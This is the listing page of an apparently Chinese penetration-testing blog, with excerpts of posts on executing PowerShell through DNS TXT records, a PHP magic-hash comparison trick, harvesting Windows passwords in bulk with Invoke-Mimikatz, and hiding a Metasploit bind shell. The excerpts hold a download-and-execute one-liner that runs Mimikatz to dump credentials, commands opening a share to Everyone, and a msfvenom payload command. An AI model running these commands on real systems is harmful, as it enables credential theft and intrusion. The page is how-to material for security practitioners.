Evi1cg's blog

  • 首页

  • 标签

  • 分类

  • 归档

  • 工具

  • 友链

  • 搜索

通过DNS TXT记录执行powershell

发表于 2015-10-08 | 分类于 奇技淫巧

通过DNS TXT记录执行powershell

0x00简介


DNS TXT记录一般用来记录某个主机名或者域名设置的说明,在这里可以填写任何东西,长度限制255。绝大多数的TXT记录是用来做SPF记录(反垃圾邮件)。本篇文章主要介绍如何使用nishang通过创建TXT记录执行powershell脚本。当然,首先你要有一个域名。

0x01创建TXT记录


这里需要使用nishang中的一个脚本OUT-DnsTxt。

阅读全文 »

tips

发表于 2015-10-03 | 分类于 奇技淫巧

<?php if (md5('240610708') == "0") { echo "Matches"; } ?>

阅读全文 »

使用Invoke-Mimikatz.ps1批量获取windows密码

发表于 2015-09-28 | 分类于 奇技淫巧

通常可以使用以下方式获取登陆windows的密码:

1
powershell "IEX (New-Object Net.WebClient).DownloadString('http://dwz.cn/1OropX'); Invoke-Mimikatz -DumpCreds"

通常在域渗透的时候,我们可能想要获得更多的密码,针对server08以后的服务器获取ntds.dit的hash以后还不一定能破解出来,所以可以通过Mimikatz来获取明文密码,但是一台一台登陆去获取会很慢且不方便,所以这里介绍一个批量的方法:

1.创建共享文件夹:

1
2
3
4
cd\
mkdir open
net share open=C:\open /grant:everyone,full
icacls C:\open\ /grant Everyone:(OI)(CI)F /t

阅读全文 »

别动我的shell

发表于 2015-09-23 | 分类于 奇技淫巧

别动我的shell

MSF 通过ACL隐藏Bind Shell

1
root@kali:~# msfvenom -p windows/shell_hidden_bind_tcp LPORT=8889 AHOST=192.168.52.129 -f exe > hidden_shell.exe

AHOST 就是攻击者的IP:

1442976249708.png

阅读全文 »

powerpreter

发表于 2015-09-23 | 分类于 工具收集

powerpreter下载:PS F:\powerpreter> (new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/sa ...

阅读全文 »
1…18192021
Evi1cg

Evi1cg

此博客主要用来记录自己技术生涯中所学的一些知识,用来分享和备忘。
104 日志
7 分类
54 标签
RSS
GitHub Twitter 微博 E-Mail
whois api
© 2015 – 2022 Evi1cg